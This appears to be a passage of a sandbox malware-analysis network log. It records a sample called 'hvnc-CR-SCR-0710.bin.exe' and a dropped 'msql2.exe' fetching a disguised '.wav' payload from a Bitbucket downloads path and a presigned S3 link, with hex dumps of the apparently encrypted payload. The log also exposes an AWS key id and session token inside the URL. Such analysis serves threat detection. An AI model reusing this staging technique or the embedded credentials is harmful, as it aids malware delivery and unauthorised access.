"include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Server-Timing: atl-edge;dur=150,atl-edge-internal;dur=3,atl-edge-upstream;dur=149,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	3.5.30.95	443	7164	C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 16:15:01 UTC	1201	OUT	GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07cr [TRUNCATED] Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
2024-10-13 16:15:01 UTC	550	IN	HTTP/1.1 200 OK x-amz-id-2: g3MjM5aonCVdz1C/H1KqQWCnp5TFTTnRl8CDbkzr78ajqrKIq6+/VrKTWKqN+s+WMQ+deq6FcRenIHA3duk7vO0R2U9VukrA x-amz-request-id: EWMXXC0PQ2NZ4C94 Date: Sun, 13 Oct 2024 16:15:02 GMT Last-Modified: Mon, 07 Oct 2024 05:41:20 GMT ETag: "6743b5552184d378f5eb1c1c303af917" x-amz-server-side-encryption: AES256 x-amz-version-id: TrCpjDBI_X1bmuanDpHA_fbr7esTfqxW Content-Disposition: attachment; filename="Pkvloobmwfh.wav" Accept-Ranges: bytes Content-Type: audio/wav Content-Length: 1199624 Server: AmazonS3 Connection: close
2024-10-13 16:15:01 UTC	16384	IN	Data Raw: da 7f 6d da d0 0c c0 a1 5f 20 e8 0f 36 c3 b6 b8 69 e1 8b 64 61 a8 70 00 14 3e 21 c6 4d 0f 67 56 12 63 27 5b 3c 2d b3 02 66 b7 91 48 90 a7 43 e3 80 17 0b 28 00 d0 7c d3 47 95 58 e3 a8 e5 57 e9 28 31 3e 6c b1 2d 69 44 14 1c ec 03 92 1e fd 5d d5 07 25 af 57 a3 1b 54 69 ed d0 e8 6d 81 2b c7 17 c2 c8 9b d4 cb 97 18 48 39 ad 8c 76 cf 40 3e 83 6c a5 73 c3 ef 85 42 73 84 3f ee 2e 5d 3c 70 ef bc 6f 3d 41 21 46 5f d3 7a e8 6e 5b 5e 45 d5 f3 64 12 23 54 72 96 fb c7 8f a8 f6 a8 bd 80 ed d7 7b 8c 9f 1f e1 26 f1 01 ac db 5e 88 72 62 bc 11 04 a4 c9 36 da df 39 dc 46 6d 44 e7 b5 1d ac 0f 06 c0 16 4a 57 36 ef 90 2f 40 bf c9 98 bc 0b 7b 20 e8 19 06 14 92 ae ed 93 0d a7 18 54 55 23 cb e0 d0 47 4f 81 50 4b 9d 98 b9 b0 9d 83 1e 58 12 16 71 36 1e 1a 37 83 15 2b 1a d1 1b 50 d5 Data Ascii: m_ 6idap>!MgVc'[<-fHC(\|GXW(1>l-iD]%WTim+H9v@>lsBs?.]<po=A!F_zn[^Ed#Tr{&^rb69FmDJW6/@{ TU#GOPKXq67+P
2024-10-13 16:15:01 UTC	474	IN	Data Raw: 90 68 7b 2e 5a 87 ac 7a 2e d2 6f b0 09 4e 75 8e c8 d0 b4 ae 73 27 b4 f7 72 89 cc c6 a6 14 ca 53 ba 10 12 49 a8 a0 22 5e bc 20 da e5 76 c2 37 fc b1 23 98 a8 eb 1c 0c 38 30 b8 84 7a 42 c0 74 9f 4c 32 1f d4 6c 44 d7 40 b9 13 10 63 ce 5a ea a4 2f d5 71 b2 6e 33 d4 a6 49 6c 95 6c cf 6d 3e 7b de 44 ed 60 46 12 71 c6 cc 61 60 da cf 2c e3 92 79 7b ff 15 22 66 e6 0e 7a 43 e8 9c 24 d4 0a b1 ab 4b b5 63 34 8f 11 dc 65 43 29 2f 07 86 b4 2c b5 e0 d5 fb 05 b8 41 95 9d 46 9e 2c d1 63 49 fe 96 95 de 51 75 79 b6 62 7c 4c 47 18 82 63 82 61 2f 10 34 ff 5e 5d 08 ea 04 0b 20 8c 9e a0 f5 15 18 e8 11 89 a6 bd 49 d3 d8 9a 08 1e 42 dd da 5a 64 54 cd e6 b0 3c e1 a5 e6 a1 c6 87 db b2 17 8f 70 73 ec 59 69 41 26 c0 d5 56 5f fb 9f 5c 33 96 33 ed 1a df fe 45 ce e9 b5 85 6e 55 13 96 e3 Data Ascii: h{.Zz.oNus'rSI"^ v7#80zBtL2lD@cZ/qn3Illm>{D`Fqa`,y{"fzC$Kc4eC)/,AF,cIQuyb\|LGca/4^] IBZdT<psYiA&V_\33EnU
2024-10-13 16:15:01 UTC	16384	IN	Data Raw: 87 07 f9 dc d9 96 40 77 b8 7c 19 76 a0 8b b3 05 b4 b5 25 7c 9d d7 40 14 86 5a 60 1c c1 56 17 7e 6f bd a8 5b 0d ed ce e8 38 a2 21 24 be 96 1f c7 63 ba 7e 11 2c 09 24 b2 3f 16 82 41 6b 7e e0 af 7a 53 57 af 77 c0 bd 99 99 75 9a 9e 29 d2 23 bd 34 d1 a7 a0 f4 00 92 ce f3 8d ab 8e e2 d8 a3 0b ee 49 5e 24 8f 2c c9 78 9b d4 5f 28 d7 c8 d2 01 5e 4d 17 ed a5 29 6d 6e 0a 20 cc 63 06 45 3a dd cc e6 69 d8 9b a1 93 4b 52 19 4e 5d 9f a6 06 b9 14 1d 12 af ac 07 83 cb ae e6 d3 af 06 da b9 e0 44 41 fc 53 54 ae 35 7b 93 80 a1 29 e3 d7 23 6b 34 0f 33 24 82 37 15 17 83 11 a5 42 f6 01 08 99 9a 67 88 40 68 e3 c2 b2 47 ea cc cd 22 43 85 66 80 25 e0 af b8 95 45 95 a2 90 d5 f3 52 6f 88 88 c5 44 9b 6b f9 a8 bf 08 d0 f2 f6 77 1b 78 7e 34 fb 1d 58 d3 04 3e 20 b4 1c 43 57 7f 48 3c 83 Data Ascii: @w\|v%\|@Z`V~o[8!$c~,$?Ak~zSWwu)#4I^$,x_(^M)mn cE:iKRN]DAST5{)#k43$7Bg@hG"Cf%ERoDkwx~4X> CWH<
2024-10-13 16:15:01 UTC	1024	IN	Data Raw: 77 41 68 db b3 28 47 01 80 68 1a fd 5e 23 fb 09 2f f0 8a 22 e2 b1 03 c5 20 b1 8a 8e a7 62 3d 61 44 8b d2 1f fc ac 70 69 1c 97 b2 7e d8 89 04 f1 08 82 c4 69 52 9e 7e cc 71 39 37 c2 14 2d c7 ea c1 83 2e 64 8a fa 94 69 a3 79 d3 b1 da bb 2a 09 11 ee 1e 34 ae b5 ea 76 c0 1b 8d d9 72 38 7b 42 6a f4 e8 79 a1 9e 7f bc 8d 81 46 06 66 3c 55 c0 4e 68 4c 59 a5 5e c8 31 50 12 e4 b3 5a df ac 87 20 29 c0 ae d6 40 75 e8 65 62 3e 3a 83 95 8a 55 06 c7 21 9c 0c 35 eb 50 56 d2 73 6e 42 5f ac 8f 1f 25 3e 44 b8 e5 d3 ba e8 60 51 c5 94 41 74 cd a2 fb 6e 94 74 99 d1 78 f8 06 68 ac af fe 02 50 66 df 45 2c b8 a0 16 5d 19 9a 23 b8 35 de 2d 32 69 0a 50 40 25 93 de 7a 1e a2 dc 25 57 c9 fa 5d aa a9 7d 94 81 53 98 7b 45 b9 1b ca 8e 99 ba 1b cd 50 3f 7e 62 a4 c8 12 74 9a 49 94 40 4d 27 Data Ascii: wAh(Gh^#/" b=aDpi~iR~q97-.diy*4vr8{BjyFf<UNhLY^1PZ )@ueb>:U!5PVsnB_%>D`QAtntxhPfE,]#5-2iP@%z%W]}S{EP?~btI@M'
2024-10-13 16:15:01 UTC	16384	IN	Data Raw: 6e bd f5 03 2c ea b5 b4 9f e7 b0 36 d4 62 70 c7 f7 3c de d4 44 51 4c 87 8c 89 58 f9 7f cd e7 b8 85 b3 a4 36 a1 83 d8 e3 ff 51 e7 78 11 ec cd 50 1e 48 7a bd 56 f9 bc db 07 2f 3c c1 e3 5a 08 8b 60 88 cd 3e b7 e9 fa 08 22 e3 b4 6b 4b 92 5d c8 f4 c5 51 94 48 a3 27 68 99 ea 84 6c 80 09 cb b0 5e 43 54 64 04 c2 80 cc 47 11 96 69 a3 4a 9d 78 15 d3 cd cd 90 43 a7 4c bf 02 1b 08 66 3d ba 4f 9d 08 97 20 22 a2 13 d3 59 81 8b 3c ad 1e 30 d1 cb da 2d 01 97 fd 16 d6 55 2c 4f 08 68 5e b9 8e 35 0c 86 e0 b5 b2 23 ce 73 1d bc ba a2 d8 65 7b 3d 30 e8 85 57 23 d3 c6 d6 21 d4 7a 93 cf cb 98 71 09 5d cd 86 99 fe aa 7a 28 a0 d3 48 a3 28 c9 d0 20 1f d8 95 0c 18 46 cc 68 e1 ec b8 b7 20 6a 7e 48 3c ee d9 37 a0 e6 8d db a5 41 93 c9 27 1e b7 f0 eb 48 54 1c 74 83 d7 8f 7b bb b4 2d b9 Data Ascii: n,6bp<DQLX6QxPHzV/<Z`>"kK]QH'hl^CTdGiJxCLf=O "Y<0-U,Oh^5#se{=0W#!zq]z(H( Fh j~H<7A'HTt{-
2024-10-13 16:15:01 UTC	1024	IN	Data Raw: 30 1e 66 1e 8e 9b f2 78 a3 fb 66 e4 51 23 07 24 a5 e5 26 7b ef ff de 8d ae 3e fe 36 0b 5c f9 2a 3a ac d3 8b 00 37 3c cd 81 cb af c2 73 eb c4 e5 7b db 4a 55 2c 22 1a d2 42 be 85 4f 88 c3 a7 c8 56 8c 15 8e f4 f0 df ed 8a b2 bd 2c 84 ee 4e 56 3d fa 2a 3f c1 f1 6b 51 da 6c 46 8c 9b 4c cb a2 93 c7 2f 6e 77 3e 9a 72 71 89 71 c5 ad 6b 3f 41 27 77 97 14 35 b4 27 8d 20 94 a1 03 7a 02 31 7d 61 d5 2d cf 70 51 5f aa 64 ea c1 7b c7 34 0e 31 b7 08 ff 9c 09 94 ac 0d 97 46 b0 fa 54 aa e4 a0 fb a6 ca 1b 79 24 62 ea 67 c5 31 16 27 d5 b9 db 09 a1 11 a1 6c a9 f0 9e 6f d4 86 36 d5 1a b5 a8 8f 98 f2 a9 74 f9 be 00 6e 9b 06 92 f4 16 f0 fa f3 37 4c 1c e5 6f c8 79 48 84 cb 81 62 f2 8b de 88 1d db e1 cb 59 0e c0 48 52 05 20 aa b9 2b 46 78 d2 04 f4 1c 0e 98 42 fc f7 1a 41 d5 5d 5a Data Ascii: 0fxfQ#$&{>6\:7<s{JU,"BOV,NV=?kQlFL/nw>rqqk?A'w5' z1}a-pQ_d{41FTy$bg1'lo6tn7LoyHbYHR +FxBA]Z
2024-10-13 16:15:01 UTC	1795	IN	Data Raw: 11 7b 52 15 5f 19 bf 96 55 d4 40 da 6b 16 4b a5 17 db 9d 82 03 79 11 a3 49 f4 a5 bb 93 26 e3 1a eb af 0c 1c 99 b5 14 10 d7 e7 94 78 51 d5 9a 18 67 17 ec e3 25 7d 26 25 a5 4c 76 30 c1 7f 8a 4d 4d 12 e6 d0 60 5d d1 63 d9 8e 2e 44 2d aa cc 2d 61 cc fd b4 7c 07 53 bc 50 f6 b6 a9 4a 49 3a 5e f9 ea ab a1 62 23 67 79 22 0f 2b 55 21 74 4f 8d 5e 4f 55 7e 54 5a b9 ea b3 96 e9 75 cb 9f 1f 6c f6 f6 16 61 d5 40 f8 90 7b 02 f8 44 3f b2 cc e2 bf 32 76 54 5c d5 e8 11 29 41 05 7e a9 75 9b 71 da fe c8 03 42 0c 42 30 ed 52 a2 db 4e a9 71 d8 90 59 16 67 e2 ce 1c 43 8f fc 38 e9 1f fc 0c 60 79 7d 4b 26 c2 d8 47 7e e1 36 98 3b 2f 4d f6 26 3e b7 ed a1 31 e9 39 5d f8 3f ef 08 bb a3 34 30 a5 2c 50 a0 72 63 fd 3a e0 2a 20 37 ab 13 55 f7 1f 71 48 07 58 34 d7 3b f2 91 7c 24 8e be 57 Data Ascii: {R_U@kKyI&xQg%}&%Lv0MM`]c.D--a\|SPJI:^b#gy"+U!tO^OU~TZula@{D?2vT\)A~uqBB0RNqYgC8`y}K&G~6;/M&>19]?40,Prc:* 7UqHX4;\|$W
2024-10-13 16:15:01 UTC	16384	IN	Data Raw: 7e 0f 9c b1 22 99 81 01 3e 77 b0 8b a2 07 8d b8 83 a9 95 69 4e f5 27 59 7f 6e e8 b6 e3 a2 d2 14 8d 6f 41 44 59 59 39 56 7a 26 38 45 b7 9e ca 9a c1 16 70 c9 b1 1f ef 18 ae 76 b7 1f 62 ec b8 39 4e 66 eb d7 6a 8a fd 1e 1e e8 4b a9 5d 85 8c 87 ed 04 2e 76 f4 92 77 26 37 a6 36 65 a1 a1 1a 89 1b b2 09 0b 7b 09 5d 81 db 3f b4 7d 5e 18 bc 12 fe ed 8f 20 4d 2c 39 90 1b 50 bd 96 36 5d 27 6b 3c 1c dd e4 67 46 3e 38 37 48 24 b2 33 d7 89 3b d0 f0 df e2 47 de b3 d0 ff dd 88 b1 03 54 5c e6 18 67 7a 45 27 c8 b3 a3 01 5d 77 4f 28 bf e5 8c 7a e6 0c 8c 98 14 4e 00 04 0b ff fe 8f 73 4c 58 19 42 aa 31 16 77 49 82 7c 66 e5 29 37 0d 4f 44 4a 24 15 78 15 dc 96 68 f2 65 35 b0 11 1c b5 42 07 24 18 41 f0 2f f2 9b 90 52 7f 60 6a 4a c1 cd ad dd 85 b0 73 1c b5 de f0 c0 31 23 a4 1e 8d Data Ascii: ~">wiN'YnoADYY9Vz&8Epvb9NfjK].vw&76e{]?}^ M,9P6]'k<gF>87H$3;GT\gzE']wO(zNsLXB1wI\|f)7ODJ$xhe5B$A/R`jJs1#
2024-10-13 16:15:01 UTC	1024	IN	Data Raw: 33 80 b4 c1 c0 61 16 6d 9e 95 e1 0e e3 2a 28 1e 0d e3 9e 48 64 16 4d d7 f5 14 40 5a 45 8b 4b 46 13 b7 c1 5e 79 cd d0 52 e7 37 0b 98 32 b3 c9 3d 18 9e 26 20 86 ee 43 12 c3 e7 15 42 58 70 b6 ce fe 8c ed e9 8e 50 28 cf d3 d5 3a 6a d1 63 b9 ec 31 05 6a 93 e5 41 98 e8 18 46 55 6c 40 0f 23 31 75 39 0d 6b 53 a3 73 3b 10 69 81 a6 91 fc 45 0a be 3d 61 38 a1 05 5b f4 23 2c 73 1e 47 e4 0e 06 e3 16 2a 6e bb 89 f0 8b 74 a8 9c 2d 35 65 ae f6 2b b6 77 0d 46 eb 57 0d 87 c3 6a 44 ac a1 fe 8c 9b b6 e4 e1 38 73 3b 54 8b af b9 31 bf 2f 54 f2 af f0 da 1f b6 2f a5 84 ba 4c c2 00 35 38 63 7c 40 84 b1 a3 ff d8 0c dd 62 b2 48 e0 9c 90 33 f8 c2 7a 82 93 7d 4a df 7a d6 2e a3 98 5b e5 6e 5a 0d 5b 37 fe c8 29 3d df 4f 73 07 94 94 d5 72 8e 3b 8d 58 97 77 77 86 da 2f 95 cd a3 d4 11 ca Data Ascii: 3am(HdM@ZEKF^yR72=& CBXpP(:jc1jAFUl@#1u9kSs;iE=a8[#,sGnt-5e+wFWjD8s;T1/T/L58c\|@bH3z}Jz.[nZ[7)=Osr;Xww/
2024-10-13 16:15:01 UTC	16384	IN	Data Raw: 9c 9c 2f 3c 3e b5 36 d8 dc d7 8e 7c 8c 32 ee 63 e6 b8 aa b4 24 fb 08 56 b0 2e 7f 06 20 12 c8 97 3a 25 a3 04 bf 07 87 37 40 75 d5 ac 62 d2 3b b5 df dd 45 2f c6 f8 91 2e cb ce 86 0d e6 69 6c b4 3c 4a ad c4 7d 0e 88 c3 51 80 81 4a 63 dd d1 1e a6 a4 71 19 88 b6 b5 63 8c d7 a8 47 5e 98 44 dd e8 ec 8a 67 4f df f7 43 e8 8b 91 b5 bc 85 45 aa 10 ce 92 ba e3 26 3c 9b 72 03 cc 46 17 08 94 44 a3 77 4b 77 f3 7f 4d 13 fe 86 ea bb 6e 42 78 46 e5 23 97 d2 c2 36 ed 36 e7 9b 14 a1 33 8e e9 ef d7 17 4a e3 ba 1c 6d 93 b8 d8 d6 25 f3 51 0e fa 66 5f 5f 48 0f 60 e8 79 bd ba fb 66 68 cb 5d 8f 4c 56 ca c2 9b 6f c1 ce fa 2e 41 5e fe 12 25 e0 4e d4 53 96 d3 be 6e a0 d3 18 19 36 21 ca ac 66 48 05 15 20 d9 45 67 41 66 71 65 ea 6b 0b 3c 85 01 78 1f 47 19 39 54 f0 52 9b 4f e7 15 c4 04 Data Ascii: /<>6\|2c$V. :%7@ub;E/.il<J}QJcqcG^DgOCE&<rFDwKwMnBxF#663Jm%Qf__H`yfh]LVo.A^%NSn6!fH EgAfqek<xG9TRO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	185.166.143.49	443	2140	C:\Users\user\AppData\Roaming\msql2.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 16:15:14 UTC	119	OUT	GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
2024-10-13 16:15:14 UTC	5161	IN	HTTP/1.1 302 Found Date: Sun, 13 Oct 2024 16:15:14 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBD [TRUNCATED] Expires: Sun, 13 Oct 2024 16:15:14 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: 49c338232ccc X-Version: 28f515bd4e87 X-Static-Version: 28f515bd4e87 X-Request-Count: 1520 X-Render-Time: 0.03806447982788086 X-B3-Traceid: 0025db721537428096da4433a64975bd X-B3-Spanid: 36a780861a7d8650 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; object-src 'none'; connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io .ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net [TRUNCATED] X-Usage-Quota-Remaining: 999297.838 X-Usage-Request-Cost: 713.30 X-Usage-User-Time: 0.019993 X-Usage-System-Time: 0.001406 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: 0025db721537428096da4433a64975bd Atl-Request-Id: 0025db72-1537-4280-96da-4433a64975bd Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Server-Timing: atl-edge;dur=145,atl-edge-internal;dur=8,atl-edge-upstream;dur=143,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	52.217.90.148	443	2140	C:\Users\user\AppData\Roaming\msql2.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 16:15:15 UTC	1201	OUT	GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07cr [TRUNCATED] Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
2024-10-13 16:15:15 UTC	530	IN	HTTP/1.1 200 OK x-amz-id-2: 4JreevHw4SDa0RraxP1EcyJve+R3/LcBDmy+2ukLg4C7lX9RdCgTh8ey6+gXPAyhvcJJcZ4BJdY= x-amz-request-id: DSR9HN1K2RF64B1Q Date: Sun, 13 Oct 2024 16:15:16 GMT Last-Modified: Mon, 07 Oct 2024 05:41:20 GMT ETag: "6743b5552184d378f5eb1c1c303af917" x-amz-server-side-encryption: AES256 x-amz-version-id: TrCpjDBI_X1bmuanDpHA_fbr7esTfqxW Content-Disposition: attachment; filename="Pkvloobmwfh.wav" Accept-Ranges: bytes Content-Type: audio/wav Server: AmazonS3 Content-Length: 1199624 Connection: close
2024-10-13 16:15:15 UTC	15763	IN	Data Raw: da 7f 6d da d0 0c c0 a1 5f 20 e8 0f 36 c3 b6 b8 69 e1 8b 64 61 a8 70 00 14 3e 21 c6 4d 0f 67 56 12 63 27 5b 3c 2d b3 02 66 b7 91 48 90 a7 43 e3 80 17 0b 28 00 d0 7c d3 47 95 58 e3 a8 e5 57 e9 28 31 3e 6c b1 2d 69 44 14 1c ec 03 92 1e fd 5d d5 07 25 af 57 a3 1b 54 69 ed d0 e8 6d 81 2b c7 17 c2 c8 9b d4 cb 97 18 48 39 ad 8c 76 cf 40 3e 83 6c a5 73 c3 ef 85 42 73 84 3f ee 2e 5d 3c 70 ef bc 6f 3d 41 21 46 5f d3 7a e8 6e 5b 5e 45 d5 f3 64 12 23 54 72 96 fb c7 8f a8 f6 a8 bd 80 ed d7 7b 8c 9f 1f e1 26 f1 01 ac db 5e 88 72 62 bc 11 04 a4 c9 36 da df 39 dc 46 6d 44 e7 b5 1d ac 0f 06 c0 16 4a 57 36 ef 90 2f 40 bf c9 98 bc 0b 7b 20 e8 19 06 14 92 ae ed 93 0d a7 18 54 55 23 cb e0 d0 47 4f 81 50 4b 9d 98 b9 b0 9d 83 1e 58 12 16 71 36 1e 1a 37 83 15 2b 1a d1 1b 50 d5 Data Ascii: m_ 6idap>!MgVc'[<-fHC(\|GXW(1>l-iD]%WTim+H9v@>lsBs?.]<po=A!F_zn[^Ed#Tr{&^rb69FmDJW6/@{ TU#GOPKXq67+P
2024-10-13 16:15:15 UTC	16384	IN	Data Raw: e7 d3 51 51 39 73 7c bb e5 b5 f9 f7 a8 cf 8e 5f 2c 59 48 7b 63 56 f4 62 a0 d9 7e 4f 0e 94 bb e3 b0 41 cc 35 1a f7 2c 08 b3 5d 4a b5 6e 35 dd e2 0b e2 4c f0 fa 06 67 00 0a b2 2b 85 5a 90 af 67 2e 15 3e be ad 48 3a 6e 99 85 49 b1 3b 3e a3 ce 06 43 74 ec 3d 10 e3 fc 9d 5e 08 94 4a c6 0f aa 9a 44 97 89 27 c3 4a fe 0b 9a 79 4c 10 64 fe c6 48 3a 9a 66 d9 5b 9d a2 a7 40 00 88 e9 b0 75 f0 6b c5 b0 9e ff 04 03 4d 94 49 ce 69 a3 ae 57 09 a1 b5 d8 d6 b7 4c 66 1f 99 94 dd cc 64 b6 b5 c6 cb 13 39 78 f6 cb d1 f3 1e 87 62 19 8f d3 67 a4 0c 88 ad 1b 67 fd 47 b6 23 84 eb 85 0a ee 85 fa aa 3f 0e cf d7 c7 89 6a 8e 8f 75 6e 43 25 7b 39 f8 8f 93 f9 69 8e 46 55 9e 24 b0 89 57 f7 e8 64 0c 25 c4 b1 dc 1d 2b 54 57 59 84 cf c5 64 f2 06 af 32 a6 7a 07 e3 bf c5 d8 3e aa 3e f4 bc 39 Data Ascii: QQ9s\|_,YH{cVb~OA5,]Jn5Lg+Zg.>H:nI;>Ct=^JD'JyLdH:f[@ukMIiWLfd9xbggG#?junC%{9iFU$Wd%+TWYd2z>>9
